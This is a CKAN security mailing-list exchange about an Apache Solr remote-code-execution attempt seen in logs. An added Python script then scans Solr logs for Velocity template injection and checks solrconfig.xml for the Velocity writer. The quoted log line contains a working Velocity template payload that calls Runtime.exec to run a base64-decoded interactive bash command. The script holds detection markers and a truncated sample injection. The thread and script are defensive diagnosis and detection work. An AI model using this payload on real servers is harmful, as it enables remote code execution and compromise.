[CKAN-Security] Vulnerability in the Wild

Tyler Kennedy tk at tkte.ch
Wed Nov 6 18:51:14 UTC 2019


Hello.

This is not a CKAN exploit, but an exploit in Solr allowing remote code
execution. It is copied from
https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template.
Are you sure this actually affected you? You will see garbage in the logs
that did nothing all the time as bots try to find exploits. Make sure
VelocityResponseWriter is disabled (should be by default) and this exploit
will do nothing.

Thank you,
Tyler Kennedy

On Wed, Nov 6, 2019 at 12:49 PM Fabian Fink <fink at h0st.space> wrote:

> Ckan 2.8.x
> Solr 6.6.x
> Solr Logs:
>  webapp=/solr path=/select
> params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('/bin/bash+-c+{echo,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%3D%3D}|{base64,-d}|{bash,-i}'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity}
> hits=0 status=0 QTime=0
>
> any version unaffected?
> how could we fix it?
>
> --
> Repo: https://github.com/ckan/ckan-security
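Tyler's reply reduces to two checks: confirm whether the Velocity response writer is actually declared in solrconfig.xml, and separate real template-injection attempts from the background scanner noise he describes. The Python script below is an added example, not code from either poster or from the CKAN or Solr projects. The log lines and config fragments embedded in it are constructed to mimic the Solr 6 request-log and solrconfig layout seen in the quoted message; the indicator strings, the `enable` attribute handling and the log regexes are assumptions to tune for your own deployment.

```python
import re
from urllib.parse import unquote_plus
from xml.etree import ElementTree as ET

# Query parameters that hand Solr a caller-supplied Velocity template, plus
# substrings that indicate the template is reaching into the JVM rather than
# rendering a page. Assumption: this indicator set is a reasonable starting
# point for alerting; extend it for your environment.
VELOCITY_PARAM_NAMES = {"v.template", "v.template.custom", "v.layout"}
SUSPICIOUS_TEMPLATE_MARKERS = ("class.forName", "getRuntime", ".exec(")

# Solr request log layout (assumed): "... path=/select params={...} hits=N status=N QTime=N".
# Greedy match to the last '}' so braces inside parameter values do not cut the capture short.
PARAMS_RE = re.compile(r"params=\{(.*)\}")
PATH_RE = re.compile(r"path=(\S+)")

# Constructed sample: one ordinary query, one template injection attempt of the
# shape quoted in the thread (body truncated to the first two directives), and
# one request that merely selects the velocity writer with a named template.
SAMPLE_LOG = """\
2019-11-06 12:40:01.123 INFO  (qtp-12) [   x:ckan] o.a.s.c.S.Request [ckan]  webapp=/solr path=/select params={q=*:*&wt=json&rows=10} hits=3 status=0 QTime=4
2019-11-06 12:40:07.456 INFO  (qtp-13) [   x:ckan] o.a.s.c.S.Request [ckan]  webapp=/solr path=/select params={q=1&v.template=custom&v.template.custom=%23set($x%3D'')+%23set($rt%3D$x.class.forName('java.lang.Runtime'))&wt=velocity} hits=0 status=0 QTime=0
2019-11-06 12:40:09.789 INFO  (qtp-14) [   x:ckan] o.a.s.c.S.Request [ckan]  webapp=/solr path=/select params={q=title:data&wt=velocity&v.template=browse} hits=12 status=0 QTime=8
"""

# Constructed solrconfig.xml fragments: one that registers the writer, one that does not.
SOLRCONFIG_WITH_VELOCITY = """<config>
  <queryResponseWriter name="json" class="solr.JSONResponseWriter"/>
  <queryResponseWriter name="velocity" class="solr.VelocityResponseWriter" startup="lazy">
    <str name="template.base.dir">${velocity.template.base.dir:}</str>
  </queryResponseWriter>
</config>"""
SOLRCONFIG_WITHOUT_VELOCITY = """<config>
  <queryResponseWriter name="json" class="solr.JSONResponseWriter"/>
</config>"""


def parse_solr_request(line):
    """Return (path, {param: [decoded values]}) for a request log line, or None if it is not one."""
    m = PARAMS_RE.search(line)
    if not m:
        return None
    path_m = PATH_RE.search(line)
    path = path_m.group(1) if path_m else ""
    params = {}
    for pair in m.group(1).split("&"):
        key, _, value = pair.partition("=")
        # Solr logs values URL-encoded; '+' is a space and %3D is '='.
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return path, params


def classify_request(path, params):
    """Return human-readable findings for one parsed request; an empty list means nothing noteworthy."""
    findings = []
    if "velocity" in params.get("wt", []):
        findings.append("velocity response writer requested (wt=velocity)")
    for name in sorted(set(params) & VELOCITY_PARAM_NAMES):
        findings.append(f"velocity template parameter supplied ({name})")
        markers = {mk for value in params[name] for mk in SUSPICIOUS_TEMPLATE_MARKERS if mk in value}
        for mk in sorted(markers):
            findings.append(f"template body in {name} contains {mk!r}")
    return findings


def scan_log(text):
    """Return [(line_number, path, findings)] for every request line that produced a finding."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parsed = parse_solr_request(line)
        if parsed is None:
            continue
        path, params = parsed
        findings = classify_request(path, params)
        if findings:
            hits.append((lineno, path, findings))
    return hits


def velocity_writer_declared(solrconfig_xml):
    """True if solrconfig.xml registers a queryResponseWriter backed by VelocityResponseWriter.

    Assumption: a literal enable="false" attribute disables the plugin; a
    property-substituted value such as enable="${...}" is not resolved here and
    is treated as enabled, so review it by hand.
    """
    root = ET.fromstring(solrconfig_xml)
    for qrw in root.iter("queryResponseWriter"):
        if "VelocityResponseWriter" in qrw.get("class", ""):
            if qrw.get("enable", "true").strip().lower() != "false":
                return True
    return False


if __name__ == "__main__":
    for lineno, path, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno} {path}: " + "; ".join(findings))
    for label, cfg in (("with", SOLRCONFIG_WITH_VELOCITY), ("without", SOLRCONFIG_WITHOUT_VELOCITY)):
        print(f"config {label} writer -> declared={velocity_writer_declared(cfg)}")
```

The two halves are deliberately paired: a request log line like the one quoted above reports `hits=0 status=0` whether or not the template was rendered, so the log alone cannot settle the question Fabian asks, while the solrconfig.xml check can. The scanner still reports any `wt=velocity` request even without suspicious markers, because a CKAN deployment that never uses the writer should see none, and a steady stream of them is the "garbage in the logs" Tyler refers to.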